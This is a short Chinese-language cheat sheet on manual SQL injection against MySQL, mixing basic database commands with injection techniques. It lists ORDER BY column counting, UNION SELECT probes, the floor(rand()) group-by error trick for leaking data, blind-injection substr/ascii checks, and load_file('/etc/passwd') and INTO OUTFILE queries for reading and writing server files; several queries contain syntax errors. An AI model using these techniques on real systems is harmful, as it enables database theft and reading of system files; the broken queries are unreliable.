mysql手工注入总结

mysql -u 用户名 -p 密码 -h IP地址

show databases; 查看数据库

select version();　　php注入的版本号

use database(表名）；

show tables; 显示这张表的表名

select * from table;

insert * from table;

create database 库名； 创建数据库

create table 表名（字段名 VARCHAR(20),字段名 CHAR(1));

　create table pet{ name varchar(20), owner varchar(20)}

desc 表名； 如：desc pet 查看表的信息

drop database 库名； 删除库名

drop table 表名； 删除数据表

delete from 表名； 将表中记录清空

mysql中的information_schema，提供了访问数据元数据的方式，确切说是信息数据库。其中保存着关于MySQL的服务器所维护的所有其他数据库的信息。如数据库名、数据库的表等。常用的information_schema数据库表说明：

SCHEMATA表--------------提供当前mysql实例中所有数据库信息

TABLES表-----------------提供了关于数据库中的表的信息

COLUMNS表---------------提供了表中的列信息。

通过（基于单引号错误、双引号错误、数字型、单引号变形、双引号变形）判断注入的类型；

order by 判断有多少列

union select ---(version(),user(),current_user)

select count(*) from information_schema.tables;

select rand();

select table_name,table_schema from information_schema.tables group by table_schema;

select database();

select concat((select database())); 将字符串连接在一起

select concat(0x3a,0x3a,(select database()),0x3a,0x3a)

select concat(0x3a,0x3a,(select database()),0x3a,0x3a) a; 连接起来形成一个单一字符串，起个名字a

select concat(0x3a,0x3a(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.columns;

select concat(0x3a,0x3a(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables;

select count(*),concat(0x3a,0x3a(select database()),0x3a,0x3a, floor (rand()*2)) a from information_schema.tables group by a;将得到字符串分组

这样在几次尝试后，会得到一个错误信息，由于随机数字重复了，这里会爆出一些想要的信息

select * from users into outfile "/tmp/tests.txt" 导出

select * from users limit 0,1 into dumpfile "/tmp/test2.txt" dumpfile只能使用一行，所以下载数据库时候给个限制。

select load_file("/etc/passwd"); 将文件系统数据导入mysql中

select load_file("etc/passwd") into outfile "tmp/test4.txt";

select length(database());

select substr(database(),1,1);取第一个字符

select ascii(substr(database(),1,1));